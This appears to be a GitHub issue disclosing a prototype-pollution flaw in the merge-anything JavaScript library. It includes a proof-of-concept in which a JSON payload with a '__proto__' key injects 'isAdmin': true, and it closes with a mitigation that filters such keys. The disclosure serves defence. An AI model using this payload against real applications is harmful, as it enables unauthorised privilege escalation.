POC: ``` import { merge } from 'merge-anything' const defaultPermissions = { read: true, write: false, delete: false, }; const payload = JSON.parse('{"__proto__": { "isAdmin": true }}'); const userPermissions = merge({}, defaultPermissions, payload); console.log('User Permissions:', userPermissions); console.log(userPermissions['isAdmin']) if (userPermissions.isAdmin) { console.log('User has admin access'); } else { console.log('User does not have admin access'); } ``` This code demonstrates how prototype poisoning can occur by merging an object containing a __proto__ property with default permissions using the merge-anything library. The isAdmin property is injected into the object's prototype. Implications - Unauthorized Access: Users can gain elevated permissions without proper authorization. - Security Breach: Compromised data integrity and potential for privilege escalation. - Inconsistent Behavior: Application logic relying on permissions can be bypassed, leading to unpredictable behavior and security vulnerabilities. Mitigation - Specifically check for keys like "__proto__", "prototype", "constructor" Since this library has a lot of weekly downloads so there might multiple use cases that might be effected by this bug
AI Analysis
This issue appears to be discussing a feature request or bug report related to the repository. Based on the content, it seems to be resolved. The issue was opened by 0xhexr4 and has received 1 comments.
Add a comment
Comment form would go here